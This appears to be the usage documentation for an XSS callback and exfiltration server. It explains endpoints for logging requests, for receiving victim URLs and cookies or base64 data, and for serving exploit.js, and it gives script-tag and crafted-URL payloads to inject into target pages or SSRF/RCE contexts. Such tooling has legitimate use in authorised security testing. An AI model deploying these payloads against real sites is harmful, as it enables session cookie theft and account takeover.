Get Started

Please make sure that you have set up all your variables inside the .env file before reading on.

Endpoints:

  • /logger/{your_code}: Send normal requests here to have them logged (request logging).
  • /: Send requests here to generate injection alerts. It accepts query string parameters such as url, by, code, plaintext, cookie, and b64.
  • /exploit.js: The exploit.js file is served here; you can link to this JS file remotely from the victim server with a script tag.

Parameters:

  • url: Specifies the location of the current document/webpage
  • by: Specifies the username of the user that sent this payload
  • action parameter: one of plaintext, b64, or cookie, or none (leave blank)
  • xss: Specifies if it's an XSS attack
  • code: Required, because you need your code to access the endpoints (it is the same code as in your .env file)

Headers for XSS testing:

  • xsend-xss-payload: This header is used to track which XSS payload was used when detection is successful

How to use the alerts webhook:

  • 1.) First decide which action parameter to use: plaintext, b64, cookie, or none (leave blank)
  • 2.) In this example I choose plaintext
  • 3.) Then remember the required parameters: url, code, and by
  • 4.) Craft the URL with those: http://localhost:4000/?url=victim_url&code=yourcode&by=yourusername&plaintext=
  • 5.) Inject this inside an HTML tag or JavaScript code that will make a request to this URL
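
The following is an added example, not code from this project: it checks an alerts-webhook URL against the parameters documented above (url, code and by required, plus an optional action parameter). The helper name parseAlertUrl, the one-action-per-request rule and the treatment of the b64 value as standard base64 text are assumptions.

```javascript
// Added example, not the project's own code. parseAlertUrl is a hypothetical helper.
const REQUIRED = ["url", "code", "by"];
const ACTIONS = ["plaintext", "b64", "cookie"];

function parseAlertUrl(rawUrl, expectedCode) {
  const parsed = new URL(rawUrl);
  const q = parsed.searchParams;
  const errors = [];

  if (parsed.pathname !== "/") errors.push("alerts endpoint is /");
  for (const name of REQUIRED) {
    if (!q.get(name)) errors.push(`missing required parameter: ${name}`);
  }
  // code must equal the value configured in the .env file.
  if (q.get("code") && q.get("code") !== expectedCode) errors.push("code mismatch");

  // Assumption: a request carries at most one action parameter.
  const present = ACTIONS.filter((name) => q.has(name));
  if (present.length > 1) {
    errors.push(`multiple action parameters: ${present.join(", ")}`);
  }
  const action = present.length === 1 ? present[0] : "none";
  let data = present.length === 1 ? q.get(action) : "";

  if (action === "b64") {
    // Assumption: the b64 value is standard base64 of UTF-8 text.
    if (/^[A-Za-z0-9+/]*={0,2}$/.test(data) && data.length % 4 === 0) {
      data = Buffer.from(data, "base64").toString("utf8");
    } else {
      errors.push("b64 value is not valid base64");
    }
  }
  return { ok: errors.length === 0, errors, action, url: q.get("url"), by: q.get("by"), data };
}

// Constructed sample values; 123456 is the example code used on this page.
const sample = new URL("http://localhost:4000/");
sample.search = new URLSearchParams({
  url: "https://app.example.test/profile?id=7",
  code: "123456",
  by: "tester1",
  b64: Buffer.from("hello").toString("base64"),
}).toString();
console.log(parseAlertUrl(sample.href, "123456"));
```

Building the query string with URLSearchParams percent-encodes the nested url value, so its own ? and & characters are not read as parameters of the alert request.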

How to use the logger webhook:

  • 1.) code is the only required parameter for this
  • 2.) Craft the URL to the logger endpoint: http://localhost:4000/logger/{your_code}/{custom_message}

  • Example: http://localhost:4000/logger/123456/anythingblahblah

How to link to the exploit.js script:

  • 1.) Craft the URL to the JS file: http://localhost:4000/exploit.js
  • 2.) Embed it in a script tag: <script src="http://localhost:4000/exploit.js"></script>

Now you can craft all the links into your XSS/HTML payload, or even use them in other injection attacks that support HTTP requests, like some RCE and SSRF contexts. Check the Generator.